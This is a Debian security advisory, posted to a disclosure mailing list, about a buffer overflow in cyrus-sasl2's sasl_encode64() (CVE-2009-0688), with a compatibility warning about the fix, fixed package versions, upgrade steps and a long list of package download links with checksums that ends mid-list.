From nion at debian.org Mon Jun 1 13:42:10 2009 From: nion at debian.org (Nico Golde) Date: Mon, 1 Jun 2009 14:42:10 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1807-1] New cyrus-sasl2/cyrus-sasl2-heimdal packages fix arbitrary code execution Message-ID: <20090601124210.GA27624@ngolde.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA-1807-1 security at debian.org http://www.debian.org/security/ Nico Golde June 1st, 2009 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : cyrus-sasl2, cyrus-sasl2-heimdal Vulnerability : buffer overflow Problem type : remote Debian-specific: no Debian bug : 528749 CERT advisory : VU#238019 CVE ID : CVE-2009-0688 James Ralston discovered that the sasl_encode64() function of cyrus-sasl2, a free library implementing the Simple Authentication and Security Layer, suffers from a missing null termination in certain situations. This causes several buffer overflows in situations where cyrus-sasl2 itself requires the string to be null terminated which can lead to denial of service or arbitrary code execution. Important notice (Quoting from US-CERT): While this patch will fix currently vulnerable code, it can cause non-vulnerable existing code to break. Here's a function prototype from include/saslutil.h to clarify my explanation: /* base64 encode * in -- input data * inlen -- input data length * out -- output buffer (will be NUL terminated) * outmax -- max size of output buffer * result: * outlen -- gets actual length of output buffer (optional) * * Returns SASL_OK on success, SASL_BUFOVER if result won't fit */ LIBSASL_API int sasl_encode64(const char *in, unsigned inlen, char *out, unsigned outmax, unsigned *outlen); Assume a scenario where calling code has been written in such a way that it calculates the exact size required for base64 encoding in advance, then allocates a buffer of that exact size, passing a pointer to the buffer into sasl_encode64() as *out. As long as this code does not anticipate that the buffer is NUL-terminated (does not call any string-handling functions like strlen(), for example) the code will work and it will not be vulnerable. Once this patch is applied, that same code will break because sasl_encode64() will begin to return SASL_BUFOVER. For the oldstable distribution (etch), this problem will be fixed soon. For the stable distribution (lenny), this problem has been fixed in version 2.1.22.dfsg1-23+lenny1 of cyrus-sasl2 and cyrus-sasl2-heimdal. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 2.1.23.dfsg1-1 of cyrus-sasl2 and cyrus-sasl2-heimdal. We recommend that you upgrade your cyrus-sasl2/cyrus-sasl2-heimdal packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1-23+lenny1.dsc Size/MD5 checksum: 1775 510a3befa02a034758711c4bf329082e http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1-23+lenny1.diff.gz Size/MD5 checksum: 76458 85b876ee4b8d33a804f1164d727a5281 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1-23+lenny1.dsc Size/MD5 checksum: 1930 6939422cb0ce3455ce5a1a494692fd68 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1.orig.tar.gz Size/MD5 checksum: 1370731 f196299b2c07f822c8c56db71b7dc7db http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1.orig.tar.gz Size/MD5 checksum: 1370731 f196299b2c07f822c8c56db71b7dc7db http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1-23+lenny1.diff.gz Size/MD5 checksum: 27834 dae4de4ce221e8d5f9ca9fbc8376f1ba Architecture independent packages: http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-doc_2.1.22.dfsg1-23+lenny1_all.deb Size/MD5 checksum: 104228 c5b2a9dac2683208cbc7fe0aeaf9e276 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 84954 9d18b6afabcdb581ba692b0de7abc489 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 603214 764f256abbe3cfc91a4c0392d79a8262 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 123794 e2d71664b9f4dbf586366a1ed21e8c23 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 76294 4e15f169d2b45fa179cdf4a919ab4316 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 198230 2b8a7bf7981b5f5d999a0a5d671ea401 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 75114 0da83acb9fbf8b7dc51989cd2c1f3e78 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 61754 6291c4405e6cbd3507737f866d6a53ee http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 165322 72628edb29a049c66a31d3ec9678ad89 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 77222 d68fe70130dd0e59ae91a98d6718d6d7 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 319558 9c80d311d0c16df5f368708e5a32c6e0 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum: 69300 2c83c31dac6f051c8a9879effd293aa8 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 78176 04d539c8841bd7d1307d74cd2c0189f9 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 114804 110e9007dc74123976337a86e856eaf0 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 68878 7db9847a4723d6826f7920ae1993906e http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 69052 84be4bf75f96bae025d2b92735670dfc http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 67958 d47d4ee189346d1bdf4b00be9cc8dcfb http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 58050 ea914b6bf177e468c156fe61bd869d41 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 276504 eaa42b2f795f8fe85ebb5f84d529071c http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 609428 91d51cc190a79b50b1b5f96d5d5e6b80 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 156374 48d94aab8c3f98eacebea35824e726e8 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 163456 05b37316e0811ecbfbda111e5628f2b1 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_amd64.deb Size/MD5 checksum: 67342 5633875f4f067e8a92860f80fd57d312 arm architecture (ARM) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 63788 fe7bd8332cbef2c77cf3dbfd377d878d http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 265720 fdb983efb59dcba138d20b08d04d9760 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 106112 a6b6abccd297cab3e5d0bb8af0c7bdc1 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 573898 24f922a08943d1036ef11c292de130c8 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 64598 a0e5097fac9b08096848ba18d602a9e6 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 67706 423ceff082b95c8d355a46d82e0c8b96 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 73592 3d20e751e51ce1001ecdf74e55756458 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 65062 3b82a869de27691439188148cd4ce84d http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 147070 52d2c37432bea8aae2ba23f8f3c4b90c http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 136654 f11faeafb7502f5eb36361f8c877223d http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_arm.deb Size/MD5 checksum: 56716 d2048db8e57059c1c9f2ade3b92ebc1f armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 56706 ccbe00612c14d8cb7c46ceec1a523f93 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 67902 c8f859a00df9b06e08e0e3f405fb5b7f http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 575992 15d54bf1d6026698c453b8c3995742e3 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 74912 47b6aac13a77bdb5fbe7d9c6585d5036 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 144840 fa380ab748a1ffe5975b97b78b2c0416 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 63884 00ff7248bca7acf9b704baaf90d0689e http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 64708 92616d18849b68029919d313679b1c82 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 263854 263639282e6004454c5b33c71b9647d4 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 104616 a276680084df232510cc4bc617055a18 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 143942 57e4a79481797f0c32f60401ee1237de http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_armel.deb Size/MD5 checksum: 63678 2eda7c4085a8f6877ce8061f907b2ad1 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 80276 d024aad3a3d2d790b0ab5f826af132eb http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 71646 00212830b9715ceda5eb01d1aaa57402 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 159494 fd9c8f622178e39834bcadfef091c736 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 71444 b93c7dae5ae9405b35cd2c41e7253c07 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 172492 207dc3d84027fc346d90d7810e588a64 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 294572 9be25532614ae62163e2b635061fe628 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 61040 25d4df1f36f401f985bf931f46b64781 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 70710 eb2a5d507bf152da6c36322fc70f449c http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 68282 f4e90c409355887a3c1fdae2471e386b http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 588948 4a74364ca6307b066927f26525ff0fdb http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_hppa.deb Size/MD5 checksum: 118338 f0a1c2c0dd52f0a4d26f3abd4d5309ad i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 57462 5ebb116b052de64d4c7014c1ae14e267 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 259252 ae246a06589d3e2779627c6d3a39eb78 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 64212 e3f9fe64851978336fe8ef915ec7b826 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 67634 8ad13d8d15d19d1dba507e4db3026c54 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 145828 dd6dc6e38f07c36d8c0bbdac20f9eee5 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 575092 fa8a679ad9aa118404834e3c46a6acbf http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 75366 cc8dc458e34dda7c3de4f70279a3105c http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 64160 51d92ff406fde2abd21e6080be6bf3a3 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 105514 36ce7fca9761b6f4dd8b94fa5a67b396 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 146610 f1447794b61c530605a2da75829f62ba http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_i386.deb Size/MD5 checksum: 65456 ecd58a3ccf79672c2ce00fe7a7b161c7 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 67580 ece86227d7eace47ab16237e915b3fec http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 91958 6536d489a5b387070c87fda3d6a928a3 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 68352 b8532fb79679952018fc9e46fb3ae9e9 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 341402 8424c2421afe1140c7c2a0ee472ad8a5 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 83024 4aacfaec8c8f15081db9655ef1050832 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 149060 90993f31514099790278be32aa5e6614 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 187396 2fcf8a48bfe03ec3aff87cd75f232ff3 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 243462 264bddaa5766aeb444d03b40eb4d7fa1 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 568004 e5fc8d3bdb48f173cf1586e6d55e5bf6 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 79706 8e11ab18902532dfd516fdeb35093312 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_ia64.deb Size/MD5 checksum: 82078 0a29e217ca95d171305ed53615b7aeb7 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 104880 5863587f4ebdfc8d2accb92c43975770 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 155770 46cc9b8f9907b607d2029b25a2d5176b http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 68930 52fbafb17a0b36cd4f4ced0257963d00 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 67240 0c00396d4af872fbd68435ce37f5b91f http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 57308 3655fa5d350a36a6e7ac7e15c487c67c http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 77244 901ab9aa01ee8f36ea0c4ae8b9b01384 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 68074 6228a649cc3c0af4278709d81a85691f http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 153862 390c96e802a795ac507d8b97d250b9bc http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 603738 bd9e9352b83c7151718a0b28e8f4d58b http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 287770 a810f916805a6c3622eecf55bac38d88 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_mips.deb Size/MD5 checksum: 67072 b8d4429a81ee151f53417dbf4e2af658 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 593356 6610f0434f090ac4da1c9d31141ff5e8 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 67462 6139841e9d8c59b4da4ab38c7518a0ca http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 68504 69adbead8bd79767a9de0f4b0354306e http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 67572 b0dadb218ba13c6fcb2cd9771b392289 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 77924 1426b53e89f0771dd89e0916fa5315b8 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 108728 0a5e4d5a5fa93992198c14fa4a018e8d http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 68454 b4d4b2b12789d6c1b9b55547bd23289f http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 164172 1b1ceb3737ab04fb22bd4a4d20e5f4c0 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 57758 b1af996db05522ffe582fc776132fe9f http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 287940 fb18899c8acd1a3fb9cfb2950c2a0786 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_mipsel.deb Size/MD5 checksum: 155390 923b0df689d8546f64d9e94668e1a8c0 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 119716 64acba5b3c822aeea5d92acdbe13cdf5 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 70260 55506c65fcb75c975d634e72ca57b499 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 70536 e2dd4053970203b291fc0064e3fc7e4f http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 625910 b49078c416463d3e6fe9e1abaa857ad7 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 71772 e73ebc9e9f7b3f957b22dbbed7af487c http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 185506 6e31ca4fc06dd38ce754b84f608b0018 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 170426 564ade009cd10f03ec390d51a18b1bc6 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 71610 e5db62f80f8a909dec79e7926db1c43a http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 281752 5595cab6b86610d4f41f648584091c24 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 61528 a4d2292554728724b07549d4e4ba9abd http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_powerpc.deb Size/MD5 checksum: 79702 cac4d2488861483529067e5bf3e57cfa s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 66690 a52cee912cf1f46018d8ed8c54ccf9b6 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 604082 0f8f8838bc5d8487de8a8b23ecb17329 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 112752 890c4b70503ab1bb94fbc0d43d6c7328 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 68984 ab0d3fc56183cd0ff319cdac869b9251 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 77658 d7e99571c7bfa56fbf753b1f69a48935 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 67948 e6e7ab2c5fc90b575896e11acdb227b4 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 166632 a98fd5a59024bd1a2bdd1fb60e692d02 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 67832 31291b7faa6591eb93d8879389a00360 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 157992 66a99b49a60c0e82d0d92d112d381c2e http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 58868 a663ebf059cf987c9949878d0efc7dfc http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_s390.deb Size/MD5 checksum: 273358 2b4557d2cf8f639984a44dfe6a889b2c sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/sasl2-bin_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 144494 